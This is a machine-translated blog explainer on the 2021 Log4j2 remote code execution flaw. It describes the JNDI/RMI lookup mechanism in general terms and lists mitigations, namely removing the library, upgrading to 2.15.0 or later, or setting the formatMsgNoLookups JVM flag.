Log4j2 major vulnerabilities and Solutions

Causes of events

  2021 year 12 month 10 Day is an ordinary day , Circle of friends , Various forums 、 Official account and group , Are discussing one Log4j2 A loophole in the , How many programmers get up in the middle of the night to change the code . this bug It even threatens the global network security , Companies that have proven that their servers are vulnerable to vulnerabilities include, but are not limited to, apple 、 Amazon 、 tesla 、 Google 、 Baidu 、 tencent 、 NetEase 、 JD.COM 、Twitter、 Steam etc. . Why does this vulnerability react so strongly ？ There are several reasons ：
  One 、 It covers a wide range （ Any use of Log4j2 Project , Are in danger
  Two 、 It's easy to operate （ Just a simple operation can seriously damage the server
  3、 ... and 、 High degree of harm （ It is equivalent to having the permission of the application
  Four 、 Long time （ It is expected that this will happen in the next few years bug, As long as the service is not updated , Loopholes are always

   according to the understanding of , This vulnerability was first discovered by Alibaba employees .11 month 24 Japan , Alibaba cloud security team to Apache Reported Apache Log4j2 Remote code execution vulnerability .12 month 9 Japan , More details are made public .

Log4j2 Introduce

   That caused such a large-scale security problem Log4j2 What is it , What's the use ？Log4j2 yes Apache A project for , One is based on Java The logging tool for . Log4j2 It's easy to control log Whether the information is displayed 、log The output type of the message 、 Output mode 、 Output format , More detailed control of the log generation process , It can be configured flexibly through the configuration file without a lot of code changes . therefore , Many Internet companies choose to use Log4j2 . The project is in progress. 2014 Reconstructed in , And introduced a lot of rich features , It is also the rewritten version , That's what we have bug. The new version of logging framework is widely used in business system development , Used to record log information . So the main victims this time are the use of Log4j2 Of Java application （Log4j 1.x Instead of being affected ）, The common open source projects affected by this are ：Spring-Boot-strater-log4j2、Apache Solr、Apache Flink、Apache Druid、Elasticsearch、Flume、Dubbo、Redis、Logstash、Kafka etc. .

Hazard principle

   that Log4j2 bug What is the way of destruction , It's very simple , It's like SQL Inject , This is more powerful , Is directly Code injection , Code execution permission is naturally equivalent to application permission . This belongs to a tool person who prints logs , Don't work hard , Also introduced the devil to the village .
   What is the main principle ？ When printing the log , If you find that the log content contains keywords ${ }, So in { } The contents contained will be replaced as variables , This allows an attacker to execute arbitrary commands . Detailed vulnerability disclosure can be viewed ：https://issues.apache.org/jira/projects/LOG4J2/issues/LOG4J2-3201?filter=allissues
   In fact, it is mainly because of Log4J2 A plug-in in ：Lookup, There's a big problem . This is an uncommon plug-in , But the code triggers very often , Up to every trigger in your code info,warn,error When the log is written , Will check whether to execute Lookup The logic of . Among them, the more serious problems are JndiLookup and RMILookup function ,JNDI You can find and find data and resources ,RMI It's a remote call . If you use your host , Remotely call the destructive code I started ( Application service ) Well , At this time, your service host is the meat on the chopping board , Lose your life .

Solution

Mode one ： Discard directly Log4j2
What we should pay attention to here is , You have no dependencies in the project , It doesn't mean that there is no , Need global search
Mode two ： Rise to 2.15.0 Or later
Up to 2021.12.14 Japan , It has reached 2.16-rc1 Version of the , Just a few more crazy versions these days , It is suggested to update at least to 2.15.0 Above version

Address ：https://github.com/apache/logging-log4j2/tags
Mode three ： change JVM Operation parameters
Some projects , May rely on more complex , And it is not convenient to recompile , It can be run directly , Add the following JVM Parameters , This can prohibit Lookup take effect

-Dlog4j2.formatMsgNoLookups=true